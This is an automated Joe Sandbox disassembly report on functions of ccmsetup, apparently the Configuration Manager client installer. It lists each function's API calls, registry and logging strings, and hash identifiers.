                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$ccmsetup.cpp$ccmsetup.cpp$spJob2->SetCredentials(&bgCred)
                                                                                          • API String ID: 2882836952-2557803881
                                                                                          • Opcode ID: 2947fa17062e7e29bb0cc5d412093edad7f3e0d059f0d623f5440752c5f43fe1
                                                                                          • Instruction ID: 6c35bdcee1ac05e9eaf7d704fc59a660fcccef6bf786587a70ce0a94fdeee6e1
                                                                                          • Opcode Fuzzy Hash: 2947fa17062e7e29bb0cc5d412093edad7f3e0d059f0d623f5440752c5f43fe1
                                                                                          • Instruction Fuzzy Hash: B3E09230689288A5D710AB208C0AFB83E51AB17F05F4484C4B9057D1C3DBA44641C351
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00583325
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$ccmsetup.cpp$ccmsetup.cpp$spCopyJob->QueryInterface(&spJob2)
                                                                                          • API String ID: 2882836952-3664994525
                                                                                          • Opcode ID: e1c7f3e1392f1bb1d425402d409f395f94cf0772197f35f8b959ac9a855323e0
                                                                                          • Instruction ID: 22a9a31fff86fcdadbb04b54cc1cb30b11279adec0ad6012afbc6b6524b68d38
                                                                                          • Opcode Fuzzy Hash: e1c7f3e1392f1bb1d425402d409f395f94cf0772197f35f8b959ac9a855323e0
                                                                                          • Instruction Fuzzy Hash: CEE04F30A84348E9FA14AB608D0BFFD3F15AF54F04F044599B904392C2DBB55A8AC756
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00583091
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0058309D
                                                                                          • ccmsetup.cpp, xrefs: 00583081
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058308C
                                                                                          • CcmUtilLib::CcmAppendDPAuthTokenToHeaders( L"", szDPAuthToken, &csHeaders), xrefs: 00583087
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CcmUtilLib::CcmAppendDPAuthTokenToHeaders( L"", szDPAuthToken, &csHeaders)$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-3720741107
                                                                                          • Opcode ID: 103e639bd6baa1b820e47ec98387a6965f6eef457a7da5a696aa719d3f5ef506
                                                                                          • Instruction ID: 45927c91fca7f85852aed1bfb9b2b8c793d46bc915bd9c46bb6047529268e675
                                                                                          • Opcode Fuzzy Hash: 103e639bd6baa1b820e47ec98387a6965f6eef457a7da5a696aa719d3f5ef506
                                                                                          • Instruction Fuzzy Hash: 17E08CB0A8435AE9DB11BF208C2AEEE3FA57B25B09F0448C1B946791C2CBB40689D745
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005830FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$ccmsetup.cpp$ccmsetup.cpp$dpTokenHr
                                                                                          • API String ID: 2882836952-1058242789
                                                                                          • Opcode ID: 089c65be65fdd5787cdff6ecb1dc42f03d517a0c8514a301731cc19da3105f55
                                                                                          • Instruction ID: 456493fccbec0a5feb83686b45d54c5fdf700bb2e6ce9cc6c358bbf1ef9b2af1
                                                                                          • Opcode Fuzzy Hash: 089c65be65fdd5787cdff6ecb1dc42f03d517a0c8514a301731cc19da3105f55
                                                                                          • Instruction Fuzzy Hash: 46E04FB0A84364F9DB10BB10DD1AEFD3E6A6B25B04F044485B905792C297B54B858715
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058E376
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$WaitForRunning()$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-3082747322
                                                                                          • Opcode ID: 2589318dec63ead888907bfe9bfa8e7fd926b3aa3e9c899dbd5be82b42020d15
                                                                                          • Instruction ID: 92e0fd308ec9af612e2adc3a45233376667ce2b6b4d2603338bc9eacb4fae521
                                                                                          • Opcode Fuzzy Hash: 2589318dec63ead888907bfe9bfa8e7fd926b3aa3e9c899dbd5be82b42020d15
                                                                                          • Instruction Fuzzy Hash: 47C012616C43407E9E400B505E4BC212A7E9A66F113170462B510D98E081895226A632
                                                                                          APIs
                                                                                            • Part of subcall function 0059D61A: __EH_prolog3.LIBCMT ref: 0059D621
                                                                                            • Part of subcall function 0059D61A: lstrcmpiW.KERNEL32(?,00000000,00579140,?,?,?,4B3A7248,?,?,?,?,?,0067E354,000000FF), ref: 0059D698
                                                                                          • CharNextW.USER32(?), ref: 0057920A
                                                                                          • CharNextW.USER32(00000000), ref: 00579227
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharNext$H_prolog3lstrcmpi
                                                                                          • String ID:
                                                                                          • API String ID: 1581910369-0
                                                                                          • Opcode ID: 9368d0a8f36f9bd8921903ad9c1c33391f9ac4c18a4088716361b68ece3cb74b
                                                                                          • Instruction ID: 31b27c2b975872d250f2ceaac0373f69d5c33910c3f72819bfd244efe64d49d1
                                                                                          • Opcode Fuzzy Hash: 9368d0a8f36f9bd8921903ad9c1c33391f9ac4c18a4088716361b68ece3cb74b
                                                                                          • Instruction Fuzzy Hash: 58B19F71900229DBDF25DF64DC499EDBBB5FB68310F1181EAE609A3290D7305E91EFA0
                                                                                          APIs
                                                                                          • GetAclInformation.ADVAPI32(?,005B1C78,0000000C,00000002,00000000,?,?,005B1C78,?,00000000), ref: 005B32CD
                                                                                          • GetLastError.KERNEL32(?,005B1C78,?,00000000), ref: 005B32D7
                                                                                          • GetLastError.KERNEL32(?,?,005B1C78,?,00000000), ref: 005B333A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$Information
                                                                                          • String ID:
                                                                                          • API String ID: 3506653738-0
                                                                                          • Opcode ID: 0ab65b860cc49679447a7a1ec0496c2a86157dbbd82036c8021be91349fa7ebf
                                                                                          • Instruction ID: 6eea62877dfabdb7c6687a7ddf02ea1cb266684d7f19c69e6f3c0f3d7cb26a02
                                                                                          • Opcode Fuzzy Hash: 0ab65b860cc49679447a7a1ec0496c2a86157dbbd82036c8021be91349fa7ebf
                                                                                          • Instruction Fuzzy Hash: CE118E35600215ABEB14DF698C49BBFBBECFB48711F50452AB846E6180EA21EE01C7B0
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005FE331
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F5277: __wcsnicmp.LIBCMT ref: 005F52A3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_catch___wcsnicmp
                                                                                          • String ID: CCM::Utility::UpdateProtocolInUrl$http://$https://
                                                                                          • API String ID: 3398957935-1259313752
                                                                                          • Opcode ID: 3b64cf6f1b12ef6cdf6c8ae9ac1481993959f64f62618b135f03a2d9e5bd83f8
                                                                                          • Instruction ID: 49ed1b4cdaedeeca13905f8c95b13b8c242fed06b4a8633961da7f2d2431e8a3
                                                                                          • Opcode Fuzzy Hash: 3b64cf6f1b12ef6cdf6c8ae9ac1481993959f64f62618b135f03a2d9e5bd83f8
                                                                                          • Instruction Fuzzy Hash: 6E31E460B4021EEADF14E6A8DC4FFFE6E65BF90700F148025F741A71D2DBAC590497A1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060010C
                                                                                            • Part of subcall function 006092A8: __EH_prolog3.LIBCMT ref: 006092AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_catch
                                                                                          • String ID: Successfully unloaded WMI Provider %s - %s$Unload$UnloadProvider
                                                                                          • API String ID: 1882928916-1074518252
                                                                                          • Opcode ID: d42b2ba30e346e2e9bc702470fc139f3192326b14340a775bdce4e1521cbb02a
                                                                                          • Instruction ID: c17282c64d1cef72fc3cf43231b9aec49ea0dc93db77eaab6b3554710bdc0fdf
                                                                                          • Opcode Fuzzy Hash: d42b2ba30e346e2e9bc702470fc139f3192326b14340a775bdce4e1521cbb02a
                                                                                          • Instruction Fuzzy Hash: 0131B371941249EFEB19DFD8C849ADEBBB5BF05304F148099E4446B282C7719B08CBA1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00620371
                                                                                          • lstrlenW.KERNEL32(00000000,CcmUtilLib::SplitAtQueryString,00000000,000000FF,00000000,000000FF,00000014,00587120,?,?,?), ref: 006203B0
                                                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000), ref: 00620404
                                                                                          Strings
                                                                                          • CcmUtilLib::SplitAtQueryString, xrefs: 00620391
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$H_prolog3_catch
                                                                                          • String ID: CcmUtilLib::SplitAtQueryString
                                                                                          • API String ID: 3519426085-1588836211
                                                                                          • Opcode ID: bd31fc5844791f6f39db5f1dff7d8942a9b5c951bc86fd5366d4823f536864fb
                                                                                          • Instruction ID: 400db4b5431a5517e59c8eab2d0d2e86242bd55c56ffdc75b80aaf5b14b5a4d9
                                                                                          • Opcode Fuzzy Hash: bd31fc5844791f6f39db5f1dff7d8942a9b5c951bc86fd5366d4823f536864fb
                                                                                          • Instruction Fuzzy Hash: 9921F830901A2BEBEB15FF58DC59ABEBA7ABF40310F108219B611972D3CB745D01CB90
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0061C31B
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          Strings
                                                                                          • Software\Microsoft\CCM, xrefs: 0061C358
                                                                                          • CcmUtilLib::GetCcmDataUsageThresholdPercent, xrefs: 0061C339
                                                                                          • DataUsageThresholdPercent, xrefs: 0061C385
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: CcmUtilLib::GetCcmDataUsageThresholdPercent$DataUsageThresholdPercent$Software\Microsoft\CCM
                                                                                          • API String ID: 543541842-2748923075
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 005B8201
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          Strings
                                                                                          • 9.99.9999.9999, xrefs: 005B8266
                                                                                          • Installed Version, xrefs: 005B8255
                                                                                          • SOFTWARE\Microsoft\SMS\Client\Client Components\SMS Client Base Components\Installation Properties, xrefs: 005B823B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CloseH_prolog3_
                                                                                          • String ID: 9.99.9999.9999$Installed Version$SOFTWARE\Microsoft\SMS\Client\Client Components\SMS Client Base Components\Installation Properties
                                                                                          • API String ID: 111660669-3738090429
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006262B0
                                                                                            • Part of subcall function 0061F559: __EH_prolog3_catch.LIBCMT ref: 0061F560
                                                                                            • Part of subcall function 0061F559: GetCurrentThreadId.KERNEL32 ref: 0061F5BB
                                                                                          Strings
                                                                                          • CcmUtilLib::CcmUseCachedURLsOnly, xrefs: 006262BD
                                                                                          • UseCachedURLsOnly, xrefs: 006262DF
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 006262E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CurrentThread
                                                                                          • String ID: CcmUtilLib::CcmUseCachedURLsOnly$Software\Microsoft\CCM\Security$UseCachedURLsOnly
                                                                                          • API String ID: 4040336050-1421294037
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006250DA
                                                                                            • Part of subcall function 0061F559: __EH_prolog3_catch.LIBCMT ref: 0061F560
                                                                                            • Part of subcall function 0061F559: GetCurrentThreadId.KERNEL32 ref: 0061F5BB
                                                                                          Strings
                                                                                          • CcmUtilLib::CcmIgnoreSelfSignCheckInNativeMode, xrefs: 006250E7
                                                                                          • AllowSelfSignedNativeModeCertificate, xrefs: 00625103
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 00625108
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CurrentThread
                                                                                          • String ID: AllowSelfSignedNativeModeCertificate$CcmUtilLib::CcmIgnoreSelfSignCheckInNativeMode$Software\Microsoft\CCM\Security
                                                                                          • API String ID: 4040336050-3196369311
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0062504F
                                                                                            • Part of subcall function 0061F862: __EH_prolog3_catch_GS.LIBCMT ref: 0061F869
                                                                                            • Part of subcall function 0061F862: GetCurrentThreadId.KERNEL32 ref: 0061F8CE
                                                                                          Strings
                                                                                          • CcmUtilLib::CcmGetTransportCertificateSelectionCriteria, xrefs: 00625058
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 00625078
                                                                                          • Transport Certificate Selection Criteria, xrefs: 00625073
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchH_prolog3_catch_Thread
                                                                                          • String ID: CcmUtilLib::CcmGetTransportCertificateSelectionCriteria$Software\Microsoft\CCM\Security$Transport Certificate Selection Criteria
                                                                                          • API String ID: 1198108500-1073261922
                                                                                          APIs
                                                                                          • LoadStringW.USER32(00000000,00000001,?,00001000), ref: 00593491
                                                                                          • GetDesktopWindow.USER32 ref: 005934A8
                                                                                          • MessageBoxW.USER32(00000000), ref: 005934AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: DesktopLoadMessageStringWindow
                                                                                          • String ID: ccmsetup
                                                                                          • API String ID: 3689829364-3595408352
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 0061E47E
                                                                                            • Part of subcall function 006109E6: __EH_prolog3_catch.LIBCMT ref: 006109ED
                                                                                            • Part of subcall function 006109E6: EnterCriticalSection.KERNEL32(?,00000010,00619DDF,00000000,?,?,00615238,?,CCM::Utility::CcmIsInConnectedStandby,00000020,005F1472,?), ref: 006109F7
                                                                                            • Part of subcall function 00619F74: __EH_prolog3_catch.LIBCMT ref: 00619F7B
                                                                                            • Part of subcall function 00619F74: GetCurrentThreadId.KERNEL32 ref: 00619FD7
                                                                                            • Part of subcall function 00619F74: __CxxThrowException@8.LIBCMT ref: 0061A0FB
                                                                                            • Part of subcall function 00610A36: __EH_prolog3_catch.LIBCMT ref: 00610A3D
                                                                                            • Part of subcall function 00610A36: LeaveCriticalSection.KERNEL32(?,00000010,00619E05,00000000,?,?,00615238,?,CCM::Utility::CcmIsInConnectedStandby,00000020,005F1472,?), ref: 00610A47
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CriticalSection$CurrentEnterException@8H_prolog3LeaveThreadThrow
                                                                                          • String ID: Client$HttpsState$Software\Microsoft\CCM
                                                                                          • API String ID: 4236938090-2389877349
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058329C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-3844449486
                                                                                          • Opcode ID: d23a4fca912c68bc5ef3e82501bdf26487917e0813ef93cbd5928f8e1af283d7
                                                                                          • Instruction ID: ffc905f789d33ddbd6f0332291206da60ec4e39965f998d9df3dd6c70a4bb93a
                                                                                          • Opcode Fuzzy Hash: d23a4fca912c68bc5ef3e82501bdf26487917e0813ef93cbd5928f8e1af283d7
                                                                                          • Instruction Fuzzy Hash: 56E0D8B0584288EACB21F761CC0AFEE3E65BF85F04F594084BE0536282D7748682C733
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058321B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-3844449486
                                                                                          • Opcode ID: d775721f218df84c958f797b7f2cf5ac600622cbcc3689a49ac95ab8f5be06a0
                                                                                          • Instruction ID: ffb6959d0a478a4bcde9ae26e79cd96e042389e34753d0a9e8e41f7bed87abc6
                                                                                          • Opcode Fuzzy Hash: d775721f218df84c958f797b7f2cf5ac600622cbcc3689a49ac95ab8f5be06a0
                                                                                          • Instruction Fuzzy Hash: 6FE0D8B0984298A6DB10F7208D0AFEE3F16BB96B00F0900C8FA0536282D7744685C771
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058E017
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0058E023
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058E012
                                                                                          • CopyFileLocal(m_sMsiFile, sMsiFile), xrefs: 0058E00D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CopyFileLocal(m_sMsiFile, sMsiFile)$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-4156931702
                                                                                          • Opcode ID: 1169bfc18e400349f06162310202c2673158a4aa2cbd57978cdd05a909f50d2e
                                                                                          • Instruction ID: 2898274f7cabbd3f86883b3bd68652c6b24f19146463e66512081e7649966ae3
                                                                                          • Opcode Fuzzy Hash: 1169bfc18e400349f06162310202c2673158a4aa2cbd57978cdd05a909f50d2e
                                                                                          • Instruction Fuzzy Hash: 21C012A01C43447D820187614D07CB13FA79A06B113074895E940EB0F2818054825B21
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058E10A
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058E105
                                                                                          • ccmsetup.cpp, xrefs: 0058E116
                                                                                          • CopyFileLocal(m_sMstFile, sMstFile), xrefs: 0058E100
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CopyFileLocal(m_sMstFile, sMstFile)$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-3486639633
                                                                                          • Opcode ID: ab111bd75a53ad67d0336263ff1a18ecbc466e375ba82d438d2f9cea2c7f863c
                                                                                          • Instruction ID: 56aa4905c74cac211f35ca6529bc8feaab4320d47b00bf10145e39ffee6da722
                                                                                          • Opcode Fuzzy Hash: ab111bd75a53ad67d0336263ff1a18ecbc466e375ba82d438d2f9cea2c7f863c
                                                                                          • Instruction Fuzzy Hash: E9C012111C5340EFE20467A00D0BD353FE5DA19B06707848DA241960D2D04411019B25
                                                                                          APIs
                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005DE0BA
                                                                                          • __isleadbyte_l.LIBCMT ref: 005DE0E8
                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005DE116
                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005DE14C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                          • String ID:
                                                                                          • API String ID: 3058430110-0
                                                                                          • Opcode ID: bf43949b5fcb1a2f4acb3bb5c885f55539adc813a98c914c6f171708decd8f6d
                                                                                          • Instruction ID: de07eb21ea20660d8952f02ba51277f26463161b84bec9741ef4e335f62d1df2
                                                                                          • Opcode Fuzzy Hash: bf43949b5fcb1a2f4acb3bb5c885f55539adc813a98c914c6f171708decd8f6d
                                                                                          • Instruction Fuzzy Hash: AC318331604256AFDB31EE69CC4AB6B7FB5FF41310F15452BE8148B2A0D771E851DB90
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 005B80FC
                                                                                          • GetTickCount.KERNEL32 ref: 005B8101
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B8152
                                                                                          • CoCreateGuid.OLE32(?,?), ref: 005B8186
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CountCreateCurrentGuidH_prolog3H_prolog3_ThreadTick
                                                                                          • String ID:
                                                                                          • API String ID: 1729703813-0
                                                                                          • Opcode ID: e480c3ce251b10e83bb056430778a6ddc4fda7d230a33af25f6568512614298f
                                                                                          • Instruction ID: ef6133cb192f26e972968f3e29145820339774689bd78773f61334f541c6bd3a
                                                                                          • Opcode Fuzzy Hash: e480c3ce251b10e83bb056430778a6ddc4fda7d230a33af25f6568512614298f
                                                                                          • Instruction Fuzzy Hash: 3131D331902209DFCF04DFA8C886AEE7FB9BB54300F14106EE541A7291DE74AA46CB60
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 0060A073
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • SysFreeString.OLEAUT32(00831D5C), ref: 0060A107
                                                                                          • SysFreeString.OLEAUT32(00831B04), ref: 0060A11A
                                                                                          • SysFreeString.OLEAUT32(00000008), ref: 0060A123
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: FreeString$H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 3629739108-0
                                                                                          • Opcode ID: 24925aca454b06dfc56f51f4cd00970a9899a7ebdae214e72d00b2ba804a1c92
                                                                                          • Instruction ID: ee14483a1cae9d45bc86f5caed35893517ee49324d5490f24186c317a476090a
                                                                                          • Opcode Fuzzy Hash: 24925aca454b06dfc56f51f4cd00970a9899a7ebdae214e72d00b2ba804a1c92
                                                                                          • Instruction Fuzzy Hash: 302128B1D4020AEFCB14DF98C985BEEBBB6BF44340F20816AE1116B2E1C7B05E45DB91
                                                                                          APIs
                                                                                          • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 005FE4C9
                                                                                          • VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 005FE4D2
                                                                                          • VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 005FE4E8
                                                                                          • VerifyVersionInfoW.KERNEL32(?,00000003,00000000), ref: 005FE4F7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ConditionMask$InfoVerifyVersion
                                                                                          • String ID:
                                                                                          • API String ID: 2793162063-0
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005D0284
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          Strings
                                                                                          • Failed to verify %s file hash; will skip installation of this file. Error 0x%x, xrefs: 005D0372
                                                                                          • PackageItemDetails::ValidateItemHashes, xrefs: 005D029A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
